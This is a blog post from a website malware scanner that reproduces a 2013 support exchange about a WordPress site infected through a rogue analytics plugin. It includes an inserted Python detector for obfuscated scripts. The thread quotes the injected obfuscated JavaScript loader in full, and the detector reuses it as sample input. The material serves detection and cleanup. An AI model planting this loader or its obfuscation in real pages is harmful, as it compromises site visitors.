Wednesday, March 20, 2013

Malicious WordPress plugin. Detection and resolution process.

Our team was contacted about the www.dnexpert.com website being flagged as Suspicious by our Online Malware Scanner.
The online malware scanner is available to everyone, and the results are then posted to the database according to the domain status.

The issue was that this domain was listed in the Suspicious database: http://quttera.com/lists/suspicious. After the issue had been resolved, we asked for the website owner's agreement to publish the whole discussion on our Forum and Blog so that it might help other webmasters detect similar issues.

Mirza kindly agreed, so here is the thread:

We removed his last name for privacy reasons.

On Sat, Mar 16, 2013 at 6:05 PM, Mirza wrote:
Hi guys,

My website was infected by malicious code when I installed a WordPress Google Analytics plugin from http://wordpress.org/extend/plugins/face-for-all-children-everywhere/
The plugin has since been detected by WordPress and removed, as explained here: http://wordpress.org/support/topic/somethings-mixed-up-here

I have checked my site and it no longer contains the malicious code; however, your plugin is not allowing me to rescan my site, it keeps giving me the cached results with the 4 malicious code detections. Can you please rescan my site? I don't want my URL appearing in the suspicious URLs database.

My website is: www.dnexpert.com

Thank you,
Mirza


From: Quttera Support Team To: Mirza Sent: Saturday, 16 March 2013 5:37 PM
Subject: Re: remove from suspicious database
Hi Mirza,

Thank you very much for using our WordPress plugin. Please take a look at our monitoring service: http://quttera.com/website-anti-malware-monitoring
This service will scan your site automatically every 24 hours and notify you if we find something suspicious, thus giving you the ability to detect malware on your site before it is blacklisted by Google and other blacklisting providers.

We scanned your site once again and still see some potentially suspicious files. You can access this new report either from the WordPress plugin or via this link: http://quttera.com/detailed_report/www.dnexpert.com

The issue is with this script tag found on several pages:

<script type='text/javascript' language='javascript' >
var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setOption', '6918518510413211618517817517017118416518918416718218217']);
_ga4.push(['_setOption', '1184165171180193182181185175186175181180128167168185181']);
_ga4.push(['_setOption', '1781871861711291691781751821281841711691861101221261181']);
_ga4.push(['_setOption', '8219011416718718618111416718718618111412212611818219011']);
_ga4.push(['_trackPageview', '1129195130117185186191178171132']);
var t=z="",l=pos=v=0,a1="arCo",a2="omCh";
for (v=0; v<_ga4.length; v++) t += _ga4[v][1];
l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);
</script>

The issue here is the dynamic generation of the "fromCharCode" method name, which is treated as a JavaScript code obfuscation method. Are you aware of this script block?

Thanks a lot,
Michael
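To show what "dynamically generated method name" means as a detection rule, here is an added example (not part of the original thread and not Quttera's scanner): a small Python checker that statically resolves computed member accesses such as String["fr"+a2+a1+"de"] by following simple string assignments, and combines that with the other traits of the block quoted above (long all-digit strings, parseInt over slice, document.write). The sample input is a copy of the script from the thread; the benign script, the indicator names and the threshold are assumptions made for this illustration.

```python
import re

# Sample input: the obfuscated script quoted in the support thread above
# (copied from the page), used here only as scanner input.
SAMPLE_SCRIPT = """<script type='text/javascript' language='javascript' >
var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setOption', '6918518510413211618517817517017118416518918416718218217']);
_ga4.push(['_setOption', '1184165171180193182181185175186175181180128167168185181']);
_ga4.push(['_setOption', '1781871861711291691781751821281841711691861101221261181']);
_ga4.push(['_setOption', '8219011416718718618111416718718618111412212611818219011']);
_ga4.push(['_trackPageview', '1129195130117185186191178171132']);
var t=z="",l=pos=v=0,a1="arCo",a2="omCh";
for (v=0; v<_ga4.length; v++) t += _ga4[v][1];
l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);
</script>"""

# Constructed benign script (assumption): calls fromCharCode by its literal
# name, so it must not trip the computed-method-name rule.
BENIGN_SCRIPT = """var greeting = String.fromCharCode(72, 105);
document.write("<p>" + greeting + "</p>");"""

# identifier = 'literal'  /  identifier = "literal"
ASSIGN_RE = re.compile(r"""\b([A-Za-z_]\w*)\s*=\s*(['"])(.*?)\2""")
# obj[ expr ]( ... )  -- a call through a computed member name
COMPUTED_CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\[([^\]]+)\]\s*\(")
# quoted strings made only of digits, 30 or more of them
LONG_DIGIT_STRING_RE = re.compile(r"""['"](\d{30,})['"]""")
PARSEINT_SLICE_RE = re.compile(r"\bparseInt\s*\(\s*\w+\.slice\s*\(")

# Method names that are rarely reached through a computed key in honest code.
SUSPICIOUS_METHODS = {"fromCharCode", "eval", "unescape", "atob", "write"}


def collect_string_assignments(js):
    """Map variable names to string literals assigned to them (last wins)."""
    return {m.group(1): m.group(3) for m in ASSIGN_RE.finditer(js)}


def resolve_concat(expr, env):
    """Resolve 'lit' + var + 'lit' to one string; None if any part is unknown.

    Deliberately simple: splits on '+' so a literal containing '+' is not handled.
    """
    parts = []
    for piece in (p.strip() for p in expr.split("+")):
        if len(piece) >= 2 and piece[0] == piece[-1] and piece[0] in "'\"":
            parts.append(piece[1:-1])
        elif piece in env:
            parts.append(env[piece])
        else:
            return None
    return "".join(parts)


def find_computed_method_calls(js):
    """Return (object, resolved_method_name) for each resolvable obj[expr](...)."""
    env = collect_string_assignments(js)
    found = []
    for m in COMPUTED_CALL_RE.finditer(js):
        name = resolve_concat(m.group(2), env)
        if name is not None:
            found.append((m.group(1), name))
    return found


def analyze_script(js):
    """Collect obfuscation indicators present in a script block."""
    indicators = []
    for obj, name in find_computed_method_calls(js):
        if name in SUSPICIOUS_METHODS:
            indicators.append(f"computed-method-name:{obj}.{name}")
    long_digit_strings = LONG_DIGIT_STRING_RE.findall(js)
    if long_digit_strings:
        indicators.append(f"long-numeric-strings:{len(long_digit_strings)}")
    if PARSEINT_SLICE_RE.search(js):
        indicators.append("parseInt-over-slice")
    if "document.write" in js:
        indicators.append("document.write")
    return indicators


def is_suspicious(js, threshold=2):
    """Flag when at least `threshold` independent indicators co-occur."""
    return len(analyze_script(js)) >= threshold


if __name__ == "__main__":
    for label, script in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(label, is_suspicious(script), analyze_script(script))
```

Resolving the concatenation first is what makes the rule precise: a literal String.fromCharCode(...) call in an honest script produces no indicator, while the quoted block yields the resolved name plus three further traits, so it is flagged without any decoding of the payload.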

On Sat, Mar 16, 2013 at 6:48 PM, Mirza wrote:
Hi there,

Thank you very much for replying. Yes, this is the malicious code I am worried about. I believe it was caused by a plugin that has since been removed from the WordPress repository. I have blogged about the entire ordeal here: http://www.dnexpert.com/2013/03/16/website-hacked-removing-the-google-analytics-malicious-wordpress-plugin/
I hope you don't mind me referencing your website and Facebook page.

Could you please do one more scan, as I believe the malicious code was in my cached files, which I have subsequently removed. I have also removed the offending WordPress plugin.

Thank you very much.
Mirza


From: Quttera Support Team To: Mirza Sent: Saturday, 16 March 2013 6:35 PM
Subject: Re: remove from suspicious database
Hi Mirza,

Your website was scanned again and found clean. The full report can be found here: http://quttera.com/detailed_report/www.dnexpert.com

Thank you very much for contacting us. Safe browsing and stay clean!

Michael, Quttera support team.